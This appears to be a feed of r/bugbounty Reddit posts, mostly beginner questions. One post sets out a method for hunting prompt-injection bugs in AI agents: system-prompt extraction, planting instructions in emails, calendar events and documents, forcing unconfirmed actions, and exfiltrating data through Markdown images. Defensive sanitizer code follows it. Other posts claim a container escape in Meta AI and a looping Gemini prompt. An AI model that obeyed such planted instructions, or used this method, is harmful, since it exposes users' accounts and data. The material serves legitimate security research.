my approach in bug bounty
I literally wasted my 2025 due to a lack of discipline and a misleading approach. At the start of 2025 I just wasted time doing only TryHackMe and other labs, and currently I have decided to only read disclosed writeups and do bug hunting in the real world. In doing bug bounty I only pick 1 target on Bugcrowd and observe how the application works: I go everywhere in the application, fetch every request with the help of Burp Suite, look at every parameter and understand how each parameter works, and also observe how the application reacts when I do normal user actions and when I perform unexpected actions. But with this I am not able to do XSS, because I have only read XSS blogs while doing bug hunting as I mentioned above; due to this I am not able to test XSS. I am stuck on what I need to do: is my approach the right way, or does it need some better modifications?
https://redd.it/1pz8va8
@r_bugbounty
Is this supposed to happen..?
I recently just got home from college and I keep hearing this noise, but I didn’t know where it was the first night. Come the second night, I had my dad check my room; he checked three different times and there was nothing around. Now it’s the fourth night and there’s this running or scratching-like noise inside my drawer, but there’s nothing inside the drawer or around or under it, so I believe that it’s inside the wood around the dressers. Do we know what this could be? Should I be scared? Or do I go to bed?
https://redd.it/1pzayqc
From Desktop to macOS
Hello guys, I wanna ask you about switching from Linux to a MacBook. I have a desktop PC with a Ryzen 5 3600, an RTX 3060 12 GB and 16 GB RAM, and I want to switch to a MacBook Air M2 16 2022 because I got bored of learning in the same place; I wanna start going outside to learn. There’s no problem with macOS.
https://redd.it/1pzbe8z
I found 7 critical Prompt Injection bugs in the last 2 months. Here is the framework I developed.
Hi everyone,
Over the last two months, I've been focusing heavily on AI-powered applications. After identifying 7 critical prompt injection bugs and quite a few low-hanging fruits, I wanted to share the framework I developed for hunting on these specific targets.
Here is my workflow:
### 1. Information Gathering
Just like any other target, you must first understand the system. The more you know about the architecture, the easier it is to spot vulnerabilities.
You need to identify three main factors:
* **Capabilities:** What can the app actually *do*? Can it modify sensitive info? Can it browse arbitrary domains?
* **Tools:** What tools does the AI agent have access to? (Simple test: Just ask the agent *"What tools do you have access to?"*, it will often list them).
* **Access:** What user data can the app read? Does it have access to your emails, calendar, Drive docs, etc.?
**Pro Tip:** Try to retrieve the system instructions.
> Getting the underlying system prompt gives you a clear map of how the AI is programmed to behave, its guardrails, and its limitations.
---
### 2. Injection Points
Map out every single input source the AI application can receive as data.
This takes many forms:
* **Documents:** Title, body content, headers/footers.
* **Calendar events:** Title, description, attendee information.
* **Emails:** Subject, body text, attachment name/content.
...
You must test **EVERY** source to find a viable injection point.
The workflow is really simple:
1. Plant a malicious instruction in an input source (e.g., an email sent to the victim).
2. Ask the AI to review or summarize that source.
3. If the AI executes the hidden instruction rather than just summarizing it, the app is likely vulnerable.
---
### 3. The Attack
Once you have an injection point, there are two main impact categories to investigate:
**A. Action Triggering**
Forcing the AI to take unconfirmed actions on a victim's account/data without their consent.
* *Examples:* Updating a calendar event, deleting an email, sending a Slack message, etc.
**B. Data Exfiltration**
Forcing the AI to send a victim's sensitive info to an external server you control.
* *Example:* Using Markdown image rendering to hit your server, [Joining Zoom meetings](https://arxiv.org/html/2508.12175v1#:~:text=5.5.2,User%20via%20Zoom%20), etc.
Based on your research in Step 1, identify high-value targets and construct your payloads accordingly.
It is not hard, but it requires a creative and persistent mindset.
---
### Resources
If you want to dive deeper, check out these presentations:
* [Hack to the Future (Kudelski Security)](https://kudelskisecurity.com/research/hack-to-the-future-slides-and-content)
* [Invitation Is All You Need (DEF CON 33)](https://arxiv.org/html/2508.12175v1)
* [When Guardrails Aren't Enough (Black Hat USA 25)](https://i.blackhat.com/BH-USA-25/Presentations/USA-25-Brauchler-When-Guardrails-Arent-Enough.pdf)
Thanks for reading. Happy hunting!
https://redd.it/1pzfo7t
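Seen from the application owner's side, the two impact categories in the post map to two controls: never render images from hosts you do not serve, and never let a state-changing tool run unconfirmed when the model has just read third-party content. The sketch below is an added example, not code from the post or from any product; the host allowlist, tool names and source labels are assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Assumptions (not from the post): the one host this app serves images from,
# and hypothetical tool names; replace them with your agent's real inventory.
ALLOWED_IMAGE_HOSTS = {"static.app.example"}
READ_ONLY_TOOLS = {"search_email", "read_calendar"}
UNTRUSTED_SOURCES = {"email", "calendar_event", "document"}

# Inline Markdown image: ![alt](url "optional title")
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*<?([^\s)>]*)>?[^)]*\)")
HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def image_allowed(url: str) -> bool:
    """Allow only https images on an allowlisted host; anything else can act as a beacon."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return False
    return parts.scheme == "https" and (parts.hostname or "") in ALLOWED_IMAGE_HOSTS


def sanitize_model_output(markdown: str):
    """Return (safe_text, blocked) with non-allowlisted images replaced by plain text."""
    blocked = []

    def replace_md(match):
        alt, url = match.group(1), match.group(2)
        if image_allowed(url):
            return match.group(0)
        blocked.append(url)
        return f"[image removed: {alt}]"

    def replace_html(match):
        blocked.append(match.group(0))
        return "[image removed]"

    text = MD_IMAGE.sub(replace_md, markdown)
    # Raw <img> tags are dropped outright: model output should not need them.
    text = HTML_IMG.sub(replace_html, text)
    return text, blocked


@dataclass(frozen=True)
class ToolCall:
    name: str
    context_sources: frozenset  # kinds of content the model read this turn
    user_confirmed: bool = False


def authorize(call: ToolCall) -> str:
    """Decide 'allow' or 'needs_confirmation' for a tool call the model requested."""
    if call.name in READ_ONLY_TOOLS:
        return "allow"
    # Fail closed: any tool not known to be read-only is treated as state-changing.
    if call.user_confirmed:
        return "allow"
    if call.context_sources & UNTRUSTED_SOURCES:
        return "needs_confirmation"
    return "allow"


# Constructed sample: a summary whose source e-mail carried a hidden instruction.
SAMPLE_OUTPUT = (
    "Summary: the sender asks to reschedule.\n"
    "![status](https://collector.invalid/p?d=Q1-revenue-draft)\n"
    "![logo](https://static.app.example/logo.png)\n"
)

if __name__ == "__main__":
    safe, blocked = sanitize_model_output(SAMPLE_OUTPUT)
    print(safe)
    print("blocked:", blocked)
    print(authorize(ToolCall("delete_email", frozenset({"email"}))))
```

Reference-style Markdown images (`![alt][ref]`) are not covered by this regex; a Content-Security-Policy `img-src` restriction on the page that renders the output is the backstop for anything the filter misses.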
Should I trust ChatGPT to learn cybersecurity?
Hey Reddit,
I’m interested in learning cybersecurity, but I’m debating how much I should rely on ChatGPT as a learning resource. I know it can explain concepts, give step-by-step guidance, and even simulate some labs, but I’m worried about:
* **Accuracy:** Could it give outdated or wrong info?
* **Depth:** Can it replace actual courses, books, or hands-on practice?
* **Safety:** If I follow its instructions, could I accidentally do something unsafe or illegal?
Has anyone here used ChatGPT to learn hacking, pentesting, or general cybersecurity skills? How reliable was it, and what would you recommend combining it with (labs, tutorials, YouTube, courses, etc.)?
I want to make sure I’m learning correctly without picking up bad habits or misinformation.
Thanks in advance!
https://redd.it/1pzgsej
Meta rejected container escape + AWS creds as "safeguard bypass" - then patched everything
Found in Meta AI:
• Container escape to host
• AWS IMDS credential theft
• Root privesc (sudo NOPASSWD)
• Docker socket exposure
• Hardcoded AWS keys
Meta's response:
1. "AI hallucination" ❌
2. patches everything
3. "Safeguard bypass - not eligible" ❌
You don't patch hallucinations.
Container escape ≠ Prompt injection.
Full evidence thread:
https://x.com/zektheproisback/status/2005950750430495069
Anyone else experienced this?
https://redd.it/1pzfy6x
What’s the best way to introduce someone to bug bounty?
Hi! For those who’ve taught bug bounty to a friend, sibling, or anyone else, how did you get them started? What did you teach first? And do you now collaborate on bug bounty hunting?
I’m asking because I jumped straight into bug bounty myself without really learning the fundamentals first, and while I got lucky and learned along the way, it was rough and led to a lot of burnout. I don’t want to put someone else through that, so I’m curious how others approached teaching it properly.
https://redd.it/1pzrx8t
VDP Stored XSS on out-of-scope URL
I found a stored XSS vulnerability on a subdomain on a VDP. I was confused by the scope saying:
*.theVulnerableWebsite.com (IN SCOPE)
but a few lines after:
*.theSubdomain.theVulnerableWebsite.com (OUT OF SCOPE) <- which is the subdomain I exploited
It is too late and my payload is now stored and displayed on multiple pages of their site.
I reported it anyway, but what could be the consequences?
https://redd.it/1pzydnt
I have a question regarding account squatting
So a few weeks ago I was bug hunting on a site. It allowed free sign-ups and I signed in with my email; the auth process seemed fine. But when changing the email address from inside the profile, the site changed the email address and sent a verification mail to the new email. Some functions were blocked, but I could set the 2FA to a mobile number or an app. This way I could effectively create and lock the victim's email if it was not registered before. Even if the victim tried to use the forgot password option to change the password, the 2FA made it impossible to recover.
This was rated informational, but I think this qualifies for account squatting. Can you give your thoughts?
https://redd.it/1q05yhr
Asking triagers About OWASP-A6-Security Misconfiguration
Is it relevant to make a report with this specific vulnerability when a complete OpenAPI specification for the backend is publicly accessible?
In my case it reveals all admin/internal endpoints and data structures (schemas) on a test backend.
https://redd.it/1q0db38
Gemini prompt
I found a prompt in Gemini that makes it loop and go on forever without stopping. Can I get something or no?
https://redd.it/1q0et0h
Best way to write reports
I'm a newbie and I'm looking at ways to efficiently write reports. I have seen some tools (Ghostwriter, SysReptor?) which help in writing reports. What do y'all use for report writing?
https://redd.it/1q0fglj
AI is quietly killing bug bounty hunting and most of you are pretending it’s not happening
Hey r/bugbounty,
I’ve been grinding bug bounty pretty seriously for about a year now (mostly private programs + a couple big public ones). I’ve found a handful of low/meds, a couple decent highs, but nothing life-changing. Honestly, it’s been way harder than I expected to land anything really good.
Lately I’ve been thinking a lot about why that is, and I’ve come to a conclusion that’s probably gonna piss a lot of people off: AI is already making apps dramatically harder to bug-hunt, and the impact is only going to get worse.
I know, I know "AI bad, Copilot writes trash code, haha devs still paste LLM output blindly.” Yeah that was true like 18-24 months ago. But we’re past that now. Modern AI-assisted coding (GitHub Copilot, Cursor, Claude Code, etc.) isn’t just autocomplete anymore, it’s generating entire features with proper input validation, auth checks, rate limiting, CSP headers, and even basic business logic sanity by default. Companies are also starting to run automated AI security reviews in CI/CD that catch a ton of the classic logic flaws we used to feast on.
The result? The low-hanging fruit is basically gone on anything built or maintained in the last year. IDORs are rarer, auth bypasses are rarer, payment logic bugs are rarer. Even stuff like SSRF and prototype pollution is getting caught earlier because the models have seen every public writeup ever.
I’m not saying bug bounty is dead tomorrow, but the golden era of “one weird trick → $10k critical” feels like it’s quietly ending. The people still printing money are either elite hackers finding crazy edge cases or folks with insane recon/game theory skills on niche targets. For the rest of us mortals? It’s getting brutal.
Most of the community seems to be in denial about this, lots of “AI slop” memes and dunking on junior devs using LLMs. But that’s coping. The truth is AI is raising the floor on application security faster than most hunters are raising their skills.
Change my mind. Or tell me I’m doomering too hard. I just needed to vent because I’m starting to wonder if I should pivot to something else before the payouts dry up completely.
https://redd.it/1q0gw8v
Is it really oversaturated?
I was thinking about starting to learn it besides my data science specialization in a computer science college.
Because I am already passionate about cyber security more and I want to make some income.
So, my friend told me the field is full and oversaturated. Is it true?
(He isn't working in the field, btw.)
Thanks initially ❤️
https://redd.it/1q0el2v
Reflected response in text/plain
The response reflects the input, but the content type is text/plain. The response is frameable and can be framed in one of the functionalities of the site with the same origin. Can it be forced to be rendered as HTML to execute XSS?
https://redd.it/1q0u11r
B2B emails leak
Guys, I have found 40+ leaked B2B (Business to Business) emails from my BBP target, and I found this without authentication, so is my finding a valid bug or not? Please help me, guys; I am new to bug bounty and I am also not able to trust AI for this.
https://redd.it/1q11m33
When "valid actions" compose into invalid states: are state-machine flaws under-recognized in bug bounty?
The issue arises from a latent workflow integrity flaw in the subscription and credit lifecycle state machine.
While all individual actions are valid, authenticated, and permitted, the system allows a specific sequence of legitimate state transitions that results in an unintended long-lived backend state.
This state violates expected system invariants related to:
* subscription entitlements
* promotional credit lifecycle enforcement
* financial boundary conditions
No request tampering, API manipulation, or client-side validation bypass is required.
The flaw is exposed purely through allowed UI-driven flows, indicating a missing invariant enforcement at the state-transition level, not at the input-validation level.
Root Cause
* Backend enforces local validations but not global workflow invariants
* State transitions are validated individually, but not compositionally
* No terminal guard prevents re-entry into promotional or credit-eligible states
* Time-based and organizational lifecycle transitions are not reconciled against financial constraints
In effect, the system allows a valid transition graph that contains unintended cycles.
https://redd.it/1q12vqk
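The root cause listed in the post can be checked mechanically in two places: at design time, by searching the transition graph for cycles that re-enter a credit-granting state, and at run time, by validating each transition against the account's whole history instead of only its current state. The following is an added example, not the poster's target or code; every state name and edge is hypothetical, since the post names none.

```python
# Hypothetical lifecycle graph: the post names no concrete states or edges.
TRANSITIONS = {
    "promo_trial": {"active"},
    "active": {"cancelled", "org_migrated"},
    "cancelled": {"active"},
    "org_migrated": {"promo_trial"},  # each edge looks valid on its own
}
PROMO_STATES = {"promo_trial"}  # states that grant promotional credit


class InvariantViolation(Exception):
    """Raised when a transition is rejected by the local or the global rule."""


def reentry_paths(transitions, guarded):
    """List every simple path that leaves a guarded state and re-enters it."""
    found = []
    for start in sorted(guarded):
        stack = [(nxt, [start, nxt]) for nxt in sorted(transitions.get(start, ()))]
        while stack:
            node, path = stack.pop()
            if node == start:
                found.append(path)  # closed a cycle through the guarded state
                continue
            for nxt in sorted(transitions.get(node, ())):
                if nxt == start or nxt not in path:
                    stack.append((nxt, path + [nxt]))
    return found


class Account:
    def __init__(self, state="promo_trial"):
        self.state = state
        self.history = [state]

    def promo_entries(self):
        return sum(1 for s in self.history if s in PROMO_STATES)


def apply_transition(account, new_state, max_promo_entries=1):
    """Check the edge (local rule), then the whole history (global rule)."""
    if new_state not in TRANSITIONS.get(account.state, ()):
        raise InvariantViolation(f"no edge {account.state} -> {new_state}")
    if new_state in PROMO_STATES and account.promo_entries() >= max_promo_entries:
        raise InvariantViolation(f"re-entry into {new_state} after {account.history}")
    account.state = new_state
    account.history.append(new_state)
    return account.state


def replay(sequence):
    """Apply a sequence of UI-driven actions; return (final_state, error_or_None)."""
    account = Account()
    try:
        for step in sequence:
            apply_transition(account, step)
    except InvariantViolation as exc:
        return account.state, str(exc)
    return account.state, None


if __name__ == "__main__":
    for path in reentry_paths(TRANSITIONS, PROMO_STATES):
        print("cycle through promo state:", " -> ".join(path))
    print(replay(["active", "cancelled", "active"]))
    print(replay(["active", "org_migrated", "promo_trial"]))
```

Running `reentry_paths` over the real transition table in CI turns the "unintended cycle" into a failing build before it becomes a report.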
5 Vulnerabilities Chain That Hacked Netgear Router
https://youtu.be/24P7g8nM8T0
https://redd.it/1q16hnq
YouTube
5 Vulnerabilities Chain That Hacked This Router
Chaining five different vulnerabilities to achieve Remote Code Execution is a work of art. In this video, we’re dissecting the brilliant exploit chain discovered by Claroty’s Team82 against the Netgear Nighthawk RAX30. From bypassing stack canaries to spoofing…
Weekly Beginner / Newbie Q&A
New to bug bounty? Ask about roadmaps, resources, certifications, getting started, or any beginner-level questions here!
Recommendations for Posting:
* **Be Specific:** Clearly state your question or what you need help with (e.g., learning path advice, resource recommendations, certification insights).
* **Keep It Concise:** Ask focused questions to get the most relevant answers (less is more).
* **Note Your Skill Level:** Mention if you’re a complete beginner or have some basic knowledge.
Guidelines:
* Be respectful and open to feedback.
* Ask clear, specific questions to receive the best advice.
* Engage actively - check back for responses and ask follow-ups if needed.
Example Post:
"Hi, I’m new to bug bounty with no experience. What are the best free resources for learning web vulnerabilities? Is eJPT a good starting certification? Looking for a beginner roadmap."
Post your questions below and let’s grow in the bug bounty community!
https://redd.it/1q17i0v